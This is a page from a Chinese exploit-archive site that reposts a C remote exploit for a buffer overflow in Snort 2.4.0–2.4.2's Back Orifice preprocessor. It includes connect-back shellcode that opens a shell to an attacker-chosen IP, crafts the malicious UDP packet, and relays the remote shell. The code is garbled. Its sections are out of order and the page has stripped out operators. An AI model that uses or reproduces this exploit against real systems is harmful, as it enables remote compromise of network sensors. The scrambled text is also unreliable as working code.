首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (3)


http://www.gipsky.com/
/*
* snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit
*
* by Russell Sanford (xort@tty64.org)
* -> www.code-junkies.net <-
*
* Date: Nov 11, 2005
*
* Discription: A buffer overflow exist in the snort pre-preprocessor
* designed to detect encrypted Back Orifice ping packets
* on a network. The overflow occurs as a result of a field
* size read directly from the data within that packet
* inwhich an attacker can specify.
*
* Credit: ISS XFORCE (great work as always)
*
* Information: CERT TA05-291A
*
* Respect: Pull The Plug & DARPA Net Communities
*
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>

#define buffsize 1056
#define COOKIE "*!*QWTY?"

typedef struct {
char magic[8];
int len;
int id;
char type;
char data[buffsize];
char crc;
} BOHEADER;

char buffer[buffsize 5000];
static long holdrand = 31337L;
unsigned int ret_address = 0xbfffebad;

// 90 byte Connect Back shellcode. Connects Back to Port 21 to givin IP
char shellcode[] =
"\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x43\x5f\x68"
"\x45\xc4\x34\x1e" // IP-A
"\x81\x04\x24"
"\x01\x01\x01\x01" // IP-B
"\x68\x01\xff\xfe\x13\x81\x04\x24\x01\x01\x01\x01\x6a\x10\x51\x50\x89\xe1\xb0"
"\x66\xcd\x80\x5b\x31\xc9\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0"
"\x0b\xcd\x80\xeb\xfe";

int mrand (void) {
return[1];
for(i=0; i < (18 buffsize); i ) { buffer[i] = buffer[i] ^ (mrand()%6); }

/*
* Set Up Socket To Send UDP Packet
*/

printf(" [x] Preparing to Send Evil UDP Packet to %s.\n",argv[1]);

memset(&adr_srvr,0,sizeof adr_srvr);
adr_srvr.sin_family = AF_INET;
adr_srvr.sin_port = htons(9000);
adr_srvr.sin_addr.s_addr = inet_addr(server_addr);
len_inet = sizeof adr_srvr;

s = socket(AF_INET,SOCK_DGRAM,0);

if ( s == -1 ) {
printf(" [-] Failed to Create Socket. Exiting...\n");
exit(1);
}

/*
* Send Packet
*/

printf(" [x] Sending Packet.\n");

z = sendto(s,buffer,(18 buffsize),0,(struct sockaddr *)&adr_srvr, len_inet);

if ( z == -1 ) {
printf(" [-] Failed to Send Packet. Exiting...\n");
exit(1);
}

/*
* Listen For Connect Back Shellcode
*/

printf(" [x] Listening for Connect Back Shellcode.\n");

s = socket(AF_INET,SOCK_STREAM,0);

if ( s == -1 ) {
printf(" [-] Failed to Create Socket. Exiting...\n");
exit(1);
}

memset(&adr,0,sizeof adr);
adr.sin_family = AF_INET;
adr.sin_port = htons(21);
adr.sin_addr.s_addr = INADDR_ANY;

z = bind(s,(struct sockaddr *)&adr,sizeof(struct sockaddr));

if ( z == -1 ) {
printf(" [-] Failed to Bind Socket. Exiting...\n");
exit(1);
}

alarm(30); // Set alarm so code can time out
listen(s,4);

int sin_size = sizeof(struct sockaddr_in);
int new_fd = accept(s, (struct sockaddr *)&loc_adr,&sin_size);

alarm(0);

if (new_fd == -1 ) {
printf(" [-] Failed to Accept Connection. Exiting...\n");
exit(1);
}

printf(" [x] Connection Established! Exploit Successful.\n\n");

write(new_fd,"uname -a\nid\n",12);

/*
* Establish Connection. (ripped)
*/

while (1) {
FD_SET (0, &rfds);
FD_SET (new_fd, &rfds);
FD_SET (new_fd, &wfds);

select (new_fd 1, &rfds, NULL, NULL, NULL);

if (FD_ISSET (0, &rfds)) {
l = read (0, buf, sizeof (buf));
if (l <= 0) {
exit (EXIT_FAILURE);
}
sent=0;
while (!sent) {
select (new_fd 1, NULL, &wfds, NULL, NULL);
if (FD_ISSET(new_fd, &wfds)) {
write(new_fd, buf, l);
sent=1;
}
}
}

if (FD_ISSET (new_fd, &rfds)) {
l = read (new_fd, buf, sizeof (buf));
if (l == 0) {
fprintf(stdout,"\n [x] Connection Closed By Remote Host.\n");
exit (EXIT_FAILURE);
} else if (l < 0) {
exit (EXIT_FAILURE);
}
write (1, buf, l);
}
}

return 0;
}

[2005-11-11]
附注
  1. (holdrand = holdrand * 214013L 2531011L) >> 16) & 0x7fff);
    }

    void timeout(int sig_num) {
    printf(" [-] Listen() for connect back shellcode timed out. Exploit Failed!\n");
    exit(1);
    }

    int main(int argc, char **argv) {

    signal(SIGALRM,timeout);

    int s, z, i, len_inet, IP_a, IP_b, l, sent;
    char *server_addr=argv[1];
    char *local_addr=argv[2];
    char buf[512];
    struct sockaddr_in adr_srvr, adr, loc_adr;
    fd_set rfds, wfds;

    printf("\n\t,------------------------------------------------------------,\n"
    "\t| Snort 2.4.0-2.4.2 Back Orifice Preprocessor Remote Exploit |\n"
    "\t| by Russell Sanford -
    xort@tty64.org |\n"
    "\t`------------------------------------------------------------`\n\n");

    /*
    * Check for Valid Input
    */

    if (argc < 3) {
    printf("usage: ./snortxp TARGET-IP CONNECT-BACK-IP\n\n");

    exit(1);
    }

    /*
    * Fix up Safe Values for connect back shellcode
    */

    IP_a = inet_addr(argv[2]);
    IP_b = 0;

    printf(" [x] Patching Shellcode to Connect back to %s.\n",argv[2]);

    do {
    IP_a -= 0x01010101; IP_b = 0x01010101;
    }
    while ( ((IP_a & 0x000000ff) == 0) ||
    ((IP_a & 0x0000ff00) == 0) ||
    ((IP_a & 0x00ff0000) == 0) ||
    ((IP_a & 0xff000000) == 0) );

    *(int *)&shellcode[19] = IP_a;
    *(int *)&shellcode[26] = IP_b;

    /*
    * Create And Fill In Header Info
    */

    printf(" [x] Creating Evil Packet.\n");

    BOHEADER evil_packet;

    memcpy(evil_packet.magic,COOKIE,8);
    evil_packet.len = (buffsize 38); //1094
    evil_packet.id = 0xbadc0ded;
    memset(evil_packet.data, 0x90, buffsize);
    memcpy(&evil_packet.data[buffsize-300],shellcode,90);
    evil_packet.type = 0x1;
    evil_packet.crc = 0x43;

    printf(" [x] Using Return Address: 0x%.8x.\n",ret_address);

    *(int *)&evil_packet.data[buffsize-4] = ret_address;

    /*
    * Encrypt Evil Packet
    */

    printf(" [x] Encrypting Packet.\n");

    memcpy(buffer,&evil_packet,(18 buffsize
<< Moodle <= 1.6dev SQL Injection / Command Execution Exploit Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (4) >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号